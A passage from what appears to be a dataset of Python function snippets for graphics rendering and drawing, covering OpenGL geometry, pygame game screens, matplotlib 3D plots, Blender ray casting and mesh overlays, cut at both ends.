* sin_inner_angle\n\n normal_x = cos_outer_angle * cos_inner_angle\n normal_y = sin_outer_angle * cos_inner_angle\n normal_z = sin_inner_angle\n\n vertices.extend([vertex_x, vertex_y, vertex_z])\n normals.extend([normal_x, normal_y, normal_z])\n inner_angle += inner_angle_step\n outer_angle += outer_angle_step\n\n # Create ctypes arrays of the lists\n vertices = (gl.GLfloat *len(vertices))(*vertices)\n normals = (gl.GLfloat * len(normals))(*normals)\n\n # Create a list of triangle indices.\n indices = []\n for i in range(slices - 1):\n for j in range(inner_slices - 1):\n pos = i * inner_slices + j\n indices.extend([pos, pos + inner_slices, pos + inner_slices +\n 1])\n indices.extend([pos, pos + inner_slices + 1, pos + 1])\n indices = (gl.GLuint * len(indices))(*indices)\n\n # Compile a display list\n self.list = gl.glGenLists(1)\n gl.glNewList(self.list, gl.GL_COMPILE)\n self.color.gl_set(self.opacity)\n\n gl.glPushClientAttrib(gl.GL_CLIENT_VERTEX_ARRAY_BIT)\n gl.glEnableClientState(gl.GL_VERTEX_ARRAY)\n gl.glEnableClientState(gl.GL_NORMAL_ARRAY)\n self.model_world_transform(scene.gcf,\n Vector([self.radius, self.radius,\n self.radius])).gl_mult()\n\n gl.glVertexPointer(3, gl.GL_FLOAT, 0, vertices)\n gl.glNormalPointer(gl.GL_FLOAT, 0, normals)\n gl.glDrawElements(gl.GL_TRIANGLES, len(indices), gl.GL_UNSIGNED_INT,\n indices)\n gl.glPopClientAttrib()\n\n gl.glEndList()\n gl.glCallList(self.list)", "def draw(self, screen):\n for branch_points in self.branches:\n pygame.draw.polygon(screen, self.branch_color, branch_points)\n for bottom_points in self.bottom:\n pygame.draw.polygon(screen, self.bottom_color, bottom_points)", "def render_bounding_box_3d(\n self,\n boxes3d,\n extrinsics=Pose(),\n colors=(GREEN, ),\n side_color_fraction=0.7,\n rear_color_fraction=0.5,\n texts=None,\n line_thickness=3,\n font_scale=0.5,\n ):\n if len(colors) == 1:\n colors = list(colors) * len(boxes3d)\n\n combined_transform = self._bev_rotation * extrinsics\n\n boxes_corners = boxes3d.corners.cpu().numpy()\n\n # Draw cuboids\n for bidx, (corners, color) in enumerate(zip(boxes_corners, colors)):\n # Create 3 versions of colors for face coding.\n front_face_color = color\n side_line_color = [int(side_color_fraction * c) for c in color]\n rear_face_color = [int(rear_color_fraction * c) for c in color]\n\n # Do orthogonal projection and bring into pixel coordinate space\n # corners = bbox.corners\n corners_in_bev = combined_transform * corners\n corners2d = corners_in_bev[[0, 1, 5, 4], :2] # top surface of cuboid\n\n # Compute the center and offset of the corners\n corners2d[:, 0] = (self._center_pixel[0] + corners2d[:, 0] * self._pixels_per_meter)\n corners2d[:, 1] = (self._center_pixel[1] + corners2d[:, 1] * self._pixels_per_meter)\n\n center = np.mean(corners2d, axis=0).astype(np.int32)\n corners2d = corners2d.astype(np.int32)\n\n # Draw a line connecting center and font side.\n clr = WHITE if np.mean(self._bg_clr) < 128. else DARKGRAY\n cv2.line(\n self.data, tuple(center), (\n (corners2d[0][0] + corners2d[1][0]) // 2,\n (corners2d[0][1] + corners2d[1][1]) // 2,\n ), clr, 2\n )\n\n # Draw front face, side faces and back face\n cv2.line(self.data, tuple(corners2d[0]), tuple(corners2d[1]), front_face_color, line_thickness)\n cv2.line(self.data, tuple(corners2d[1]), tuple(corners2d[2]), side_line_color, line_thickness)\n cv2.line(self.data, tuple(corners2d[2]), tuple(corners2d[3]), rear_face_color, line_thickness)\n cv2.line(self.data, tuple(corners2d[3]), tuple(corners2d[0]), side_line_color, line_thickness)\n\n if texts:\n top_left = np.argmin(np.linalg.norm(corners2d, axis=1))\n cv2.putText(\n self.data, texts[bidx], tuple(corners2d[top_left]), cv2.FONT_HERSHEY_SIMPLEX, font_scale, WHITE,\n line_thickness // 2, cv2.LINE_AA\n )", "def plot3D(x):\n cycol = cycle('bgrcmk')\n fig = plt.figure()\n ax = Axes3D(fig)\n for i in range(5):\n ax.scatter(x[:, i, 0], x[:, i, 1], x[:, i, 2], c=next(cycol),\n marker='.')\n plt.show()", "def draw_cube(self, points, color=(255, 0, 0)):\n\n # draw front\n self.draw_line(points[0], points[1], color)\n self.draw_line(points[1], points[2], color)\n self.draw_line(points[3], points[2], color)\n self.draw_line(points[3], points[0], color)\n\n # draw back\n self.draw_line(points[4], points[5], color)\n self.draw_line(points[6], points[5], color)\n self.draw_line(points[6], points[7], color)\n self.draw_line(points[4], points[7], color)\n\n # draw sides\n self.draw_line(points[0], points[4], color)\n self.draw_line(points[7], points[3], color)\n self.draw_line(points[5], points[1], color)\n self.draw_line(points[2], points[6], color)\n\n # draw dots\n self.draw_dot(points[0], point_color=color, point_radius=4)\n self.draw_dot(points[1], point_color=color, point_radius=4)\n\n # draw x on the top\n self.draw_line(points[0], points[5], color)\n self.draw_line(points[1], points[4], color)", "def draw_ground():\n for i in range(3):\n groundturtle.forward(1450)\n groundturtle.left(90)\n groundturtle.forward(25)\n groundturtle.left(90)\n groundturtle.forward(1450)\n groundturtle.right(90)\n groundturtle.forward(25)\n groundturtle.right(90)", "def draw_cube(self, vec):\n # TOP FACE\n gl.glBegin(gl.GL_QUADS)\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2] + self.spacer)\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2] + \\\n self.spacer)\n # BOTTOM FACE\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2])\n gl.glVertex3f(vec[0], vec[1], vec[2])\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2])\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2])\n # FRONT FACE\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2] + \\\n self.spacer)\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2])\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2])\n # BACK FACE\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2])\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2])\n # RIGHT FACE\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2] + \\\n self.spacer)\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2])\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2])\n # LEFT FACE\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2])\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2])\n gl.glEnd()", "def plot_surface(self):\n X, Y = np.meshgrid(self.x, self.y)\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.plot_surface(X=X, Y=Y, Z=self.z)\n plt.show()", "def _draw3djoints(ax, annots, links, alpha=1):\n colors = ['r', 'm', 'b', 'c', 'g']\n for finger_idx, finger_links in enumerate(links):\n for idx in range(len(finger_links) - 1):\n _draw3dseg(\n ax,\n annots,\n finger_links[idx],\n finger_links[idx + 1],\n c=colors[finger_idx],\n alpha=alpha)", "def main(context, event):\n for area in bpy.context.screen.areas:\n if area.type == 'VIEW_3D':\n for reg in area.regions:\n if reg.type == 'WINDOW':\n region = reg\n for space in area.spaces:\n if space.type == 'VIEW_3D':\n if hasattr(space, 'region_3d'):\n rv3d = space.region_3d\n \n user32 = windll.user32\n screensize = user32.GetSystemMetrics(78), user32.GetSystemMetrics(79)\n \n X= region.x\n Y= region.y\n top = screensize[1]\n\n win_x = bpy.context.window_manager.windows[0].x\n win_y = bpy.context.window_manager.windows[0].y\n\n flipped = top - (event['y'] + Y + win_y)\n \n coord = (event['x'] - win_x - X, flipped)\n\n view3d_utils.region_2d_to_location_3d\n \n view_vector = view3d_utils.region_2d_to_vector_3d(region, rv3d, coord)\n ray_origin = view3d_utils.region_2d_to_origin_3d(region, rv3d, coord)\n ray_target = ray_origin + view_vector\n \n guide = create_giude()\n\n def visible_objects_and_duplis():\n \"\"\"Loop over (object, matrix) pairs (mesh only)\"\"\"\n\n for obj in context.visible_objects:\n if obj.type == 'MESH':\n if obj.modeling_cloth: \n yield (obj, obj.matrix_world.copy())\n\n def obj_ray_cast(obj, matrix):\n \"\"\"Wrapper for ray casting that moves the ray into object space\"\"\"\n\n # get the ray relative to the object\n matrix_inv = matrix.inverted()\n ray_origin_obj = matrix_inv * ray_origin\n ray_target_obj = matrix_inv * ray_target\n ray_direction_obj = ray_target_obj - ray_origin_obj\n\n # cast the ray\n success, location, normal, face_index = obj.ray_cast(ray_origin_obj, ray_direction_obj)\n\n if success:\n return location, normal, face_index\n else:\n return None, None, None\n\n # cast rays and find the closest object\n best_length_squared = -1.0\n best_obj = None\n for obj, matrix in visible_objects_and_duplis():\n hit, normal, face_index = obj_ray_cast(obj, matrix)\n if hit is not None:\n hit_world = matrix * hit\n vidx = [v for v in obj.data.polygons[face_index].vertices]\n verts = np.array([matrix * obj.data.shape_keys.key_blocks['modeling cloth key'].data[v].co for v in obj.data.polygons[face_index].vertices])\n vecs = verts - np.array(hit_world)\n closest = vidx[np.argmin(np.einsum('ij,ij->i', vecs, vecs))]\n length_squared = (hit_world - ray_origin).length_squared\n if best_obj is None or length_squared < best_length_squared:\n best_length_squared = length_squared\n best_obj = obj\n guide.location = matrix * obj.data.shape_keys.key_blocks['modeling cloth key'].data[closest].co\n extra_data['latest_hit'] = matrix * obj.data.shape_keys.key_blocks['modeling cloth key'].data[closest].co\n extra_data['name'] = obj.name\n extra_data['obj'] = obj\n extra_data['closest'] = closest\n \n if extra_data['just_clicked']:\n extra_data['just_clicked'] = False\n best_length_squared = length_squared\n best_obj = obj", "def draw(self):\n self.screen.fill(pygame.Color(0,0,0))\n for brick in self.model.bricks:\n pygame.draw.rect(self.screen, brick.color, pygame.Rect(brick.x,brick.y,brick.width,brick.height))\n pygame.draw.rect(self.screen, pygame.Color(255,255,255), pygame.Rect(self.model.paddle.x,self.model.paddle.y,self.model.paddle.width,self.model.paddle.height))\n pygame.draw.ellipse(self.screen, pygame.Color(128,128,128),(self.model.ball.x-self.model.ball.r, self.model.ball.y-self.model.ball.r, 2*self.model.ball.r,2*self.model.ball.r))\n pygame.display.update()", "def on_draw(self):\n # Clearing the buffers\n self.clear()\n self.set3d()\n # Makes it so color can be added\n glColor3d(1, 1, 1)\n\n self.push(self.player.pos, self.player.rot)\n self.model.draw()\n glPopMatrix()\n self.model.process_queue_slowly()\n\n # Draws the crosshairs on the screen\n self.set2d()\n self.draw_position_label()\n self.draw_reticle()", "def wireframe(self, projection_type, canvas_dimensions):\n # Configure viewportself.screen_dimensions = {\n self.screen_dimensions = {\n \"width\": canvas_dimensions['width'],\n \"height\": canvas_dimensions['height']\n }\n\n self.projection.viewport = self.screen_dimensions\n self.projection.projection_type = projection_type\n self.projection.camera = self.cameras[0]\n self.projection.region_width = self.screen_dimensions.get('width')\n self.projection.region_height = self.screen_dimensions.get('height')\n\n # Draw polygons for each object\n projected_objects = []\n for obj in self.objects:\n print('Rendering: ', obj)\n\n world_transformation = obj.translate(\n obj.rotate(obj.scale(obj.vertices))\n )\n camera_transformation = obj.rotate(\n obj.translate(world_transformation, np.array(\n [\n -self.projection.camera.translation[0],\n -self.projection.camera.translation[1],\n -self.projection.camera.translation[2]\n ]\n )), np.array(\n [\n -self.projection.camera.rotation[0],\n -self.projection.camera.rotation[1],\n -self.projection.camera.rotation[2]\n ]\n \n )\n )\n projected_view = self.projection.project_all(camera_transformation)\n normalized_view = obj.normalize(\n projected_view, self.projection.viewport\n )\n projected_faces = []\n for face in obj.faces:\n poly = []\n for vertex_index in face:\n poly.append(\n [\n int(normalized_view[vertex_index][0]),\n int(normalized_view[vertex_index][1]),\n int(camera_transformation[vertex_index][2])\n ]\n )\n projected_faces.append(poly)\n center = list(obj.calculate_center(normalized_view))\n vertices = [ [int(p[0]), int(p[1]), int(p[2])] for p in normalized_view]\n # print('calculated_center: ', center)\n # print(''vertices)\n projected_objects.append({\n 'vertices': vertices,\n 'faces': obj.clip(self.projection.camera.translation, projected_faces),\n 'center': [ int(coord) for coord in obj.calculate_center(normalized_view) ],\n })\n print(projected_objects[0]['faces'][:20])\n return projected_objects", "def drawAll(self):\r\n for x in range(len(self.model)):\r\n self.model[x].draw()", "def draw_objects(self, view_manager):\n raise NotImplementedError(\"draw_objects can not be called directly from recoBase3D\")", "def GUI_Cube(self,canvas,XYS):\n X,Y,S = XYS\n cUp = [];cFt = [];cDn = [];cBk = [];cRi = [];cLe = []\n cUp_xi=[S + X+S*i for i in range(3)]\n cUp_yi=[Y+S*i for i in range(3)]\n cFt_xi=[S + X+S*i for i in range(3)]\n cFt_yi=[4*S+Y+S*i for i in range(3)]\n cLe_xi=[X+S*i-3*S for i in range(3)]\n cLe_yi=[4*S+Y+S*i for i in range(3)]\n cRi_xi=[X+S*i+5*S for i in range(3)]\n cRi_yi=[4*S+Y+S*i for i in range(3)]\n cDn_xi=[S + X+S*i for i in range(3)]\n cDn_yi=[2*S+2*3*S+Y+S*i for i in range(3)]\n cBk_xi=[X+S*i+9*S for i in range(3)]\n cBk_yi=[4*S+Y+S*i for i in range(3)]\n\n x=0\n for j in range(3):\n for i in range(3):\n cUp.append(canvas.create_rectangle(cUp_xi[i],cUp_yi[j],cUp_xi[i]+S,cUp_yi[j]+S,fill='white',tags = ('Up',x+0)))\n cFt.append(canvas.create_rectangle(cFt_xi[i],cFt_yi[j],cFt_xi[i]+S,cFt_yi[j]+S,fill='green',tags = ('Ft',x+18)))\n cDn.append(canvas.create_rectangle(cDn_xi[i],cDn_yi[j],cDn_xi[i]+S,cDn_yi[j]+S,fill='yellow',tags = ('Dn',x+27))) \n cBk.append(canvas.create_rectangle(cBk_xi[i],cBk_yi[j],cBk_xi[i]+S,cBk_yi[j]+S,fill='blue',tags = ('Bk',x+45)))\n cRi.append(canvas.create_rectangle(cRi_xi[i],cRi_yi[j],cRi_xi[i]+S,cRi_yi[j]+S,fill='red',tags = ('Ri',x+9)))\n cLe.append(canvas.create_rectangle(cLe_xi[i],cLe_yi[j],cLe_xi[i]+S,cLe_yi[j]+S,fill='orange',tags = ('Le',x+36))) \n x+=1\n\n return {'Up':cUp,'Dn':cDn,'Ri':cRi,'Le':cLe,'Ft':cFt,'Bk':cBk}", "def _pre_draw_bge(self):\r\n self._pre_draw_common()\r\n # draw rays\r\n self._drawRays()", "def __generate_shadows(self):\n glEnable(GL_POLYGON_OFFSET_FILL)\n glPolygonOffset(3, 0)\n self.__sh.change_shader(vertex=1, fragment=1)\n\n light = self.__face.directed_light_cartesian\n self.__light_matrix = self.__get_rotation_matrix(\n (light[0], light[1], -light[2]), 2.0)\n\n glDisable(GL_CULL_FACE)\n self.__prepare_shaders(self.__model_matrix, self.__light_matrix, True)\n self.__sh.bind_fbo()\n glClear(GL_DEPTH_BUFFER_BIT)\n glDrawElements(GL_TRIANGLES, View.__triangles.size,\n GL_UNSIGNED_SHORT, View.__triangles)\n glFinish()\n\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n self.__sh.clear()", "def draw(self, view):\n for i in self.get_aliens():\n for n in i:\n if not n is None:\n n.draw(view)\n self.get_ship().draw(view)\n self.get_ship().get_linevalue().draw(view)\n for i in self.get_PU():\n i.draw(view)\n for i in self.get_bolts():\n i.draw(view)", "def drawShapes(self):\n self.draw_polygon(self.poly3.get_points() , color = \"#000\")\n self.draw_polygon(self.poly2.get_points() , color = \"#000\")\n self.draw_polygon(self.poly1.get_points() , color = \"#000\")\n self.draw_rect(0, 0, self.width, self.height, color= \"#000\")\n \"\"\"These statements are used to determine if a point is inside any of the\n 3 polygons and if so changes the point's color\"\"\"\n if (self.poly2.point_inside_polygon(self.p1) or self.poly1.point_inside_polygon(self.p1)\n or self.poly3.point_inside_polygon(self.p1)):\n color = \"#0F0\"\n else:\n color = \"#F00\"\n self.fill_oval(self.p1.x, self.p1.y, 7, 7, color)\n\n if (self.poly2.point_inside_polygon(self.p2) or self.poly1.point_inside_polygon(self.p2)\n or self.poly3.point_inside_polygon(self.p2)):\n color = \"#0F0\"\n else:\n color = \"#F00\"\n self.fill_oval(self.p2.x, self.p2.y, 7, 7, color)\n if (self.poly2.point_inside_polygon(self.p3) or self.poly1.point_inside_polygon(self.p3)\n or self.poly3.point_inside_polygon(self.p3)):\n color = \"#0F0\"\n else:\n color = \"#F00\"\n self.fill_oval(self.p3.x, self.p3.y, 7, 7, color)", "def unit_circle_anim( ):\n\n pixels_per_unit = 200 \n\n fr_cnt = 0\n for theta in range(1,360,1):\n \n fb = pixel_op() \n fb.create_buffer(800, 800)\n fb.graticule(pixels_per_unit)\n\n # print('THETA IS ', theta )\n\n x = math.cos(mu.dtr( theta) ) \n y = math.sin(mu.dtr( theta) ) \n\n hypot = vec3(x,y,0)\n adaj = vec3(x,0,0)\n oppos = vec3(0,y,0)\n \n #form the 3 vectors of the right triangle \n obj = object3d() \n obj.one_vec_to_obj(hypot)\n obj.one_vec_to_obj(adaj)\n obj.one_vec_to_obj(oppos, adaj)\n\n #put a cube at the current theta angle \n obj.prim_cube(pos=(x, y, 0), size=.05,linecolor=(255,0,0),rot=(0,0,0),pivot='world')\n\n\n #calculate the points between 1 and theta to form a circle \n dots = []\n for dot in range(1,theta,1):\n xx = math.cos(mu.dtr( dot) ) \n yy = math.sin(mu.dtr( dot) ) \n dots.append( (xx,yy) ) \n bloody_simple_2drender('unit_circle_%s.png'%fr_cnt, pts=dots, gridsize=pixels_per_unit, pfb=fb)\n\n\n #draw the OBJ file forming a right triangle \n bloody_simple_2drender('unit_circle_%s.png'%fr_cnt, obj=[obj], gridsize=pixels_per_unit, pfb=fb)\n fb.save( 'unit_circle_%s.png'%fr_cnt )\n fr_cnt += 1", "def draw(self):\n self.screen.fill((0,51,102))\n # get the new drawables\n self.drawables = (self.game_model.get_background_drawables()\n + self.game_model.get_plane_drawables()\n + self.game_model.get_bullet_drawables()\n + self.game_model.get_enemy_drawables())\n for d in self.drawables:\n rect = d.get_rect()\n surf = d.get_surface()\n surf.set_colorkey((255,255,255))\n self.screen.blit(surf, rect)", "def plot3D(self, diaphragmpoints=None, lungpoints=None, fig=None, ax=None, diaphragmcolor='r', lungcolor='g', size=2, howplot=0, dots=0):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_xlabel('X axis')\n ax.set_ylabel('Y axis')\n ax.set_zlabel('Z axis')\n\n if diaphragmpoints is not None and lungpoints is not None:\n points = diaphragmpoints + lungpoints\n elif diaphragmpoints is not None:\n points = diaphragmpoints\n elif lungpoints is not None:\n points = lungpoints\n\n xpts, ypts, zpts = list(), list(), list()\n for i in range(len(points)):\n xpts.append(points[i][0])\n ypts.append(points[i][1])\n zpts.append(points[i][2])\n\n X = np.asarray(xpts)\n Y = np.asarray(ypts)\n Z = np.asarray(zpts)\n\n if howplot == 'wireframe':\n xpts, ypts, zpts = list(), list(), list()\n for i in range(len(pts)):\n xpts.append(pts[i][0])\n ypts.append(pts[i][1])\n zpts.append(pts[i][2])\n\n X = np.asarray([xpts])\n Y = np.asarray([ypts])\n Z = np.asarray([zpts])\n\n if dots == 1:\n ax.scatter(X, Y, Z, s=size, c='r', marker='o')\n\n ax.plot_wireframe(X, Y, Z)\n elif howplot == 1:\n ax.scatter(X, Y, Z, s=size, c=diaphragmcolor, marker='o')\n else:\n ax.scatter(X, Y, Z, s=size, c=diaphragmcolor, marker='o')\n ax.plot_trisurf(X, Y, Z, linewidth=0.2, antialiased=True)\n\n # Create cubic bounding box to simulate equal aspect ratio\n max_range = np.array([X.max() - X.min(), Y.max() - Y.min(), Z.max() - Z.min()]).max()\n Xb = 0.5 * max_range * np.mgrid[-1:2:2, -1:2:2, -1:2:2][0].flatten() + 0.5 * (X.max() + X.min())\n Yb = 0.5 * max_range * np.mgrid[-1:2:2, -1:2:2, -1:2:2][1].flatten() + 0.5 * (Y.max() + Y.min())\n Zb = 0.5 * max_range * np.mgrid[-1:2:2, -1:2:2, -1:2:2][2].flatten() + 0.5 * (Z.max() + Z.min())\n\n # Comment or uncomment following both lines to test the fake bounding box:\n for xb, yb, zb in zip(Xb, Yb, Zb):\n ax.plot([xb], [yb], [zb], 'w')\n\n plt.show()\n # fig.savefig('{}/diaphragm/{}.png'.format(DIR_RESULT))", "def enable3D(self):\r\n if(self.dataController.fileLoaded==True):\r\n self.dataController.toggleInteractiveMode()\r\n\r\n self.midsagittalView = False\r\n self.frontView = False\r\n self.topView = False\r\n self.bottomView = False\r\n self.threeDView = True", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def draw(self): \n [component.draw() for component in self.components]", "def imshow_mesh_3d(img, vertices, faces, camera_center, focal_length, colors=(76, 76, 204)):\n H, W, C = img.shape\n if not has_pyrender:\n warnings.warn('pyrender package is not installed.')\n return img\n if not has_trimesh:\n warnings.warn('trimesh package is not installed.')\n return img\n try:\n renderer = pyrender.OffscreenRenderer(viewport_width=W, viewport_height=H)\n except (ImportError, RuntimeError):\n warnings.warn('pyrender package is not installed correctly.')\n return img\n if not isinstance(colors, list):\n colors = [colors for _ in range(len(vertices))]\n colors = [color_val(c) for c in colors]\n depth_map = np.ones([H, W]) * np.inf\n output_img = img\n for idx in range(len(vertices)):\n color = colors[idx]\n color = [(c / 255.0) for c in color]\n color.append(1.0)\n vert = vertices[idx]\n face = faces[idx]\n material = pyrender.MetallicRoughnessMaterial(metallicFactor=0.2, alphaMode='OPAQUE', baseColorFactor=color)\n mesh = trimesh.Trimesh(vert, face)\n rot = trimesh.transformations.rotation_matrix(np.radians(180), [1, 0, 0])\n mesh.apply_transform(rot)\n mesh = pyrender.Mesh.from_trimesh(mesh, material=material)\n scene = pyrender.Scene(ambient_light=(0.5, 0.5, 0.5))\n scene.add(mesh, 'mesh')\n camera_pose = np.eye(4)\n camera = pyrender.IntrinsicsCamera(fx=focal_length[0], fy=focal_length[1], cx=camera_center[0], cy=camera_center[1], zfar=100000.0)\n scene.add(camera, pose=camera_pose)\n light = pyrender.DirectionalLight(color=[1.0, 1.0, 1.0], intensity=1)\n light_pose = np.eye(4)\n light_pose[:3, 3] = np.array([0, -1, 1])\n scene.add(light, pose=light_pose)\n light_pose[:3, 3] = np.array([0, 1, 1])\n scene.add(light, pose=light_pose)\n light_pose[:3, 3] = np.array([1, 1, 2])\n scene.add(light, pose=light_pose)\n color, rend_depth = renderer.render(scene, flags=pyrender.RenderFlags.RGBA)\n valid_mask = (rend_depth < depth_map) * (rend_depth > 0)\n depth_map[valid_mask] = rend_depth[valid_mask]\n valid_mask = valid_mask[:, :, None]\n output_img = valid_mask * color[:, :, :3] + (1 - valid_mask) * output_img\n return output_img", "def draw(self):\r\n arcade.draw_circle_filled(self.center.x, self.center.y, BULLET_RADIUS, BULLET_COLOR)", "def draw():\n clear()\n\n for target in targets:\n goto(target.x, target.y)\n dot(20, \"blue\")\n\n if inside(ball):\n goto(ball.x, ball.y)\n dot(6, \"red\")\n\n update()", "def on_draw(self):\n\n # clear the screen to begin drawing\n arcade.start_render()\n\n # TODO: draw each object\n self.ship.draw()\n for asteroid in self.asteroid_array:\n asteroid.draw()\n\n for bullet in self.bullets_list:\n bullet.draw()", "def display(self):\n\n self.screen.fill(self.background)\n\n for wireframe in self.wireframes.values():\n if self.displayEdges:\n for n1, n2 in wireframe.edges:\n pygame.draw.aaline(self.screen, self.edgeColour, wireframe.nodes[n1][:2], wireframe.nodes[n2][:2], 1)\n\n if self.displayNodes:\n for node in wireframe.nodes:\n pygame.draw.circle(self.screen, self.nodeColour, (int(node[0]), int(node[1])), self.nodeRadius, 0)", "def on_render(self):\n\n # set text font for in visualization\n pygame.font.init()\n font = pygame.font.SysFont('Arial', 24)\n\n # continue running algorithm until done\n if self.algorithm.isDone is False:\n self.algorithm.execute()\n\n # draw background\n for i in range(0, 3):\n for j in range(0, 3):\n self.screen.blit(self.img_grass, (i * 270, j * 270))\n\n # get water instances to draw and draw them\n allWatersList = []\n allWatersList.extend(self.area.allWatersList)\n\n for water in allWatersList:\n pygame.draw.rect(\n self.screen, (0, 0, 128),\n (water.x * 2,\n water.y * 2,\n water.width * 2,\n water.height * 2)\n )\n pygame.draw.rect(\n self.screen,\n (0, 0, 0),\n (0, self.height-50, self.width, 50)\n )\n\n # get house instances to draw and draw them\n housesToPlace = []\n housesToPlace.extend(self.area.mansionList)\n housesToPlace.extend(self.area.familyHomeList)\n housesToPlace.extend(self.area.bungalowList)\n\n for house in housesToPlace:\n # draw free space\n space = pygame.Surface((house.space * 4 + house.width * 2,\n house.space * 4 + house.height * 2))\n space.set_alpha(64)\n space.fill((180, 0, 0))\n self.screen.blit(space,\n (house.x * 2 - house.space * 2,\n house.y * 2 - house.space * 2))\n\n # draw minimum free space\n space = pygame.Surface((house.minimumSpace * 4 + house.width * 2,\n house.minimumSpace * 4 + house.height * 2))\n space.set_alpha(110)\n space.fill((100, 0, 0))\n self.screen.blit(space,\n (house.x * 2 - house.minimumSpace * 2,\n house.y * 2 - house.minimumSpace * 2))\n\n for house in housesToPlace:\n # draw house, colored based on type\n kind = type(house).__name__\n if kind == \"Mansion\":\n pygame.draw.rect(self.screen,\n (200, 255, 40),\n (house.x * 2,\n house.y * 2,\n house.width * 2,\n house.height * 2))\n elif kind == \"Bungalow\":\n pygame.draw.rect(self.screen,\n (255, 40, 200),\n (house.x * 2,\n house.y * 2,\n house.width * 2,\n house.height * 2))\n elif kind == \"FamilyHome\":\n pygame.draw.rect(self.screen,\n (0, 255, 0),\n (house.x * 2,\n house.y * 2,\n house.width * 2,\n house.height * 2))\n\n # Draw black bar at bottom of screen for extra info\n pygame.draw.rect(self.screen,\n (0, 0, 0),\n (0, self.height - 50, self.width, 50))\n\n # Draw area value and last value increase in infobox\n textSurface = font.render('Score: '\n + str(self.area.price),\n True, (255, 255, 255))\n self.screen.blit(textSurface, (10, self.height-35))\n\n # create distinct color for value decreases\n increaseColor = (255, 255, 255)\n if (self.area.price - self.lastPrice < 1):\n increaseColor = (80, 80, 80)\n textSurface = font.render('Increase: ' +\n str(self.area.price - self.lastPrice),\n True, increaseColor)\n self.screen.blit(textSurface, (330, self.height-35))\n pygame.draw.rect(self.screen,\n (0, 0, 0),\n (640, 0, 400, self.height))\n\n # save area values to draw graph\n if (self.area.price >= self.lastPrice and\n self.algorithm.isDone is False and\n self.showDecrease is False):\n\n self.scores.append(self.area.price)\n self.lastPrice = self.area.price\n\n if self.showDecrease is True and self.algorithm.isDone is False:\n self.scores.append(self.area.price)\n self.lastPrice = self.area.price\n\n # draw graph with area values\n fig = pylab.figure(figsize=[4, 4], # Inches\n dpi=100) # 100 dots per inch\n ax = fig.gca()\n ax.plot(self.scores)\n\n canvas = agg.FigureCanvasAgg(fig)\n canvas.draw()\n renderer = canvas.get_renderer()\n raw_data = renderer.tostring_rgb()\n\n surf = pygame.image.fromstring(raw_data, (400, 400), \"RGB\")\n self.screen.blit(surf, (640, 0))\n matplotlib.pyplot.close(fig)\n\n # Draw all time highest score if that's set\n if self.allTimeHigh is not 0:\n textSurface = font.render('Highest score: ' +\n str(self.allTimeHigh),\n True, (255, 255, 255))\n self.screen.blit(textSurface, (650, 410))\n\n pygame.display.flip()\n pass", "def visualize_scan(self):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(self.p1_points[:, 0], self.p1_points[:, 1], self.p1_points[:, 2], c='r')\n ax.scatter(self.p2_points[:, 0], self.p2_points[:, 1], self.p2_points[:, 2], c='g')\n ax.scatter(self.p3_points[:, 0], self.p3_points[:, 1], self.p3_points[:, 2], c='b')\n ax.scatter(self.p4_points[:, 0], self.p4_points[:, 1], self.p4_points[:, 2])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n plt.show()", "def construct3by3(listOfDBZs, showCoast=True, \n plotCentroidTrajectory=True, # this parameter and below added 2013-11-18\n DBZstream=\"\",\n verbose=False,\n ): #\n from armor.geometry.frames import setSideBySide, setUpDown\n L = listOfDBZs #alias\n #print [type(v) for v in L] #debug\n #time.sleep(3) #debug\n #L = [v for v in L if isinstance(v, dbz)]\n for im in L:\n if not isinstance(im.matrix, np.ma.MaskedArray):\n im.matrix = np.ma.array(im.matrix)\n im.load()\n im.setThreshold(0)\n if plotCentroidTrajectory:\n im.matrix= im.shortTermTrajectory(hours=6, timeInterval=3, radius=40, verbose=verbose, drawCoast=showCoast).matrix\n im.drawFrame(intensity=9999)\n #im.show()\n #im.showWithCoast(intensity=68)\n #if showCoast:\n # im.drawCoast(intensity=9999)\n #im.show()\n\n #debug\n #print L\n #print L.name\n #print '\\n'.join([v.name for v in L])\n #time.sleep(1)\n #print \"shapes for L[5], L[0], L[6]:\", L[5].matrix.shape, L[0].matrix.shape, L[6].matrix.shape\n #debug end\n if len(L) < 9:\n for i in range(9-len(L)):\n L.append(dbz(name='', matrix=L[0].matrix*0))\n #print [type(v) for v in L] #debug\n #time.sleep(3) #debug\n #L = [v for v 